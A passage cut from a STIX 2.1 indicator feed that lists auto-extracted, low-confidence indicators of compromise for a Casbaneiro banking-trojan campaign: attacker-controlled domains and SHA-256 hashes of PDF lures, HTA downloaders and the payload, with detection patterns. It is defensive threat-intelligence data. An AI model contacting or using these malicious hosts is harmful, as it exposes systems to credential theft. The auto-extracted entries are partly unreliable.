'13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--037faff5-14de-4c35-9ed8-873bc198a147","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 135.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]","pattern":"[domain-name:value = '135.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad92bada-6bf7-4146-92e0-8a34c60b7b7c","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 162.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[","pattern":"[domain-name:value = '162.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8cba4858-1d31-46b7-8fb8-7859cf2201de","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 181.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[","pattern":"[domain-name:value = '181.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba3d2b08-eb57-41ea-acf4-936c3d2b94e5","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 48.178.169.192.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[","pattern":"[domain-name:value = '48.178.169.192.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be73581d-971f-4d76-bac6-fcf96a91ddeb","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 76.180.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co","pattern":"[domain-name:value = '76.180.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a5e7583c-37e0-45d2-b200-a4d2a80eb481","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 85.182.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[","pattern":"[domain-name:value = '85.182.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--17f670a1-6a42-41d8-8ba2-c9ff42736209","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gexwalltool.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c","pattern":"[domain-name:value = 'gexwalltool.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffc76901-cfa8-4222-857b-52194db3e000","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: x-wolverine.servebbs.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C","pattern":"[domain-name:value = 'x-wolverine.servebbs.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c7da2c1-3690-46da-8efd-f1adec702bad","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 1b17917e2e183a4bd9cbcb2ed77e Malicious PDF lure PDF SHA-256 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a Malicious PDF lure Email SHA-256 debe871710268e7bb770b72c67","pattern":"[file:hashes.'SHA-256' = '0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--836cb5fb-e749-49f3-84e2-fdc61848e881","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 659880e1a8a7b0a2dd851dc5e7a3 Malicious PDF lure PDF SHA-256 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5 Malicious PDF lure PDF SHA-256 c521b3a189b0089a2558aa4e42bd","pattern":"[file:hashes.'SHA-256' = '0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61088680-25a7-4004-b3e7-79f8b36a0e9f","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 4a2145348b953b1d06e2eaf0bf2c Malicious PDF lure PDF SHA-256 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed Malicious PDF lure PDF SHA-256 62ef39ec29966d71c8254f68bd5e","pattern":"[file:hashes.'SHA-256' = '1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2926a93c-625a-46c6-be0f-048f0d850e30","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 042d76c12dbafdcc0766861827c5 Malicious PDF lure PDF SHA-256 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491 Malicious PDF lure PDF SHA-256 ea8af591fe2d605c82bb7831d2eb","pattern":"[file:hashes.'SHA-256' = '1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eaac461f-03e3-4ac4-adc6-03acf2302dd1","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 64f8db457bafafb97a011da59e73 Malicious PDF lure PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd Malicious PDF lure PDF SHA-256 bf92a287a3d79afb73a3f2d38877","pattern":"[file:hashes.'SHA-256' = '40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b02d33e-0699-4004-b3e4-3e297e5fef25","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 89eb6b87bb0 2f0bd59d565 Phishing email artifact HTA SHA-256 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044 HTA downloader HTA SHA-256 85767416f8d1e73833ccaa193263d119","pattern":"[file:hashes.'SHA-256' = '4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--54469edd-775c-4ae4-98e3-2a2470342ce9","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 246d3d50110c6b0c248919ad796c6fd4 HTA downloader HTA SHA-256 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697 HTA downloader HTA SHA-256 92a1428e125f33de012c7f52fb0827be","pattern":"[file:hashes.'SHA-256' = '4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60d70f49-1831-41a6-8cfb-f1348c6aeba9","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ca6e1b70fe30ba3752b881574365 Malicious PDF lure PDF SHA-256 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95 Malicious PDF lure PDF SHA-256 d13ad6fc5fda54e65f1214e554a5","pattern":"[file:hashes.'SHA-256' = '47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--09075b1e-f9ae-444b-9780-eb013766cc78","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 3b5c42dd2a33b5a6520159b41c43b093 HTA downloader HTA SHA-256 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c HTA downloader HTA SHA-256 5b3c2442831d4844ea6b86942f1a0ba2","pattern":"[file:hashes.'SHA-256' = '51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d4622e1-deab-4fb7-8db5-899ea9ea9b19","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: f537a02949315eb768c88906b0c65add HTA downloader HTA SHA-256 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e HTA downloader HTA SHA-256 8092b9de455463296898fcaf8c9955d1","pattern":"[file:hashes.'SHA-256' = '5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c24b2ae2-859c-45dc-84df-c317402ff0fd","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: c8224686669ba4b64196591414fdc64c HTA downloader HTA SHA-256 5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02 HTA downloader HTA SHA-256 71dea06c2271a46fc2fd6092e2ba0c2f","pattern":"[file:hashes.'SHA-256' = '5b3c2442831d4844ea6b86942f1a0ba27170018382cbc362343db63717d0ff02']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d19ed40-f314-4083-99d1-fbbbc0ec0ae3","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: badab12bcdcb47f3dad8bc6fa8ed Malicious PDF lure PDF SHA-256 62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5 Malicious PDF lure PDF SHA-256 1f1a89bef73e4866a198a08e750f","pattern":"[file:hashes.'SHA-256' = '62ef39ec29966d71c8254f68bd5e320cf24a042d76c12dbafdcc0766861827c5']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5bcf64df-1c77-4239-bdbc-a19dc999178a","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 02b1b25b78e5f3707e81bad5054cf4e8 HTA downloader HTA SHA-256 6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093 HTA downloader HTA SHA-256 51503ce1373c7fa72a1da5c5c4b30f88","pattern":"[file:hashes.'SHA-256' = '6547736c31dabb5bef2a290b32a72bf63b5c42dd2a33b5a6520159b41c43b093']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c906f111-60a0-44ee-9d0e-e21f7150ff21","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: compromise (IoCs):- Type Indicator Description PDF SHA-256 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73 Malicious PDF lure PDF SHA-256 40d253480f752805e58c21266e40","pattern":"[file:hashes.'SHA-256' = '6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81f484e3-c8ba-45c8-8fd1-8635c9b49541","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: aff294f5250c2eed406765032cb68756 HTA downloader HTA SHA-256 6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4 HTA downloader HTA SHA-256 4540c3af3b1d8c52256f4580dd4d002f","pattern":"[file:hashes.'SHA-256' = '6e6bd2f7566ffa52d52fa9d5f048bbb9246d3d50110c6b0c248919ad796c6fd4']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a0ff397-f927-42bb-a1a9-0f00d387d26a","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ff91c829d87f566bee453d715280 Malicious PDF lure PDF SHA-256 711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859 Malicious PDF lure PDF SHA-256 d910e08a11a4f6f764e7495f4602","pattern":"[file:hashes.'SHA-256' = '711c0aa8cde078aa349fb329e3e44e4272ea66a5e651ad8a64893c76a725c859']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef8b7e7d-8675-46e3-b1b1-31bb827d4421","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 7170018382cbc362343db63717d0ff02 HTA downloader HTA SHA-256 71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secures","pattern":"[file:hashes.'SHA-256' = '71dea06c2271a46fc2fd6092e2ba0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1266f928-634e-4f21-ae1a-592d585d7bf6","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 5d7407ba AutoIt loader component Casbaneiro payload SHA-256 7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8 Casbaneiro payload Cryptocurrency address 0xb4c12078448fdef","pattern":"[file:hashes.'SHA-256' = '7de637539159dc17ceedb0aae783930ee68639b6d8036ef8147027c5ebca3fc8']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71378fe5-4cd1-4daf-b084-fb280aa6d5f8","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 2abf7f72ef093292c86c1e9e7c2be456 HTA downloader HTA SHA-256 7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8 HTA downloader HTA SHA-256 6547736c31dabb5bef2a290b32a72bf6","pattern":"[file:hashes.'SHA-256' = '7e04e86c07213fed7bebccd9953818b102b1b25b78e5f3707e81bad5054cf4e8']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce74a95a-7e0b-4db8-aaff-894f865a5193","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 976b299ee27c5fc3d42f2673170ab95e HTA downloader HTA SHA-256 8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33 HTA downloader HTA SHA-256 99fcabf7c996d6ec077ccd745a158a3a","pattern":"[file:hashes.'SHA-256' = '8092b9de455463296898fcaf8c9955d1c00dae6812c03bba019edf9c059ece33']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--14a473e4-7ffe-43ae-b18d-bdcb1640c497","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 50c8155ed113f3f62337d756e6915044 HTA downloader HTA SHA-256 85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f HTA downloader HTA SHA-256 f1aa14ebfd2da477edba94b34f09f775","pattern":"[file:hashes.'SHA-256' = '85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fbe7c106-d809-4d69-b588-6b2cdf9f4e01","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 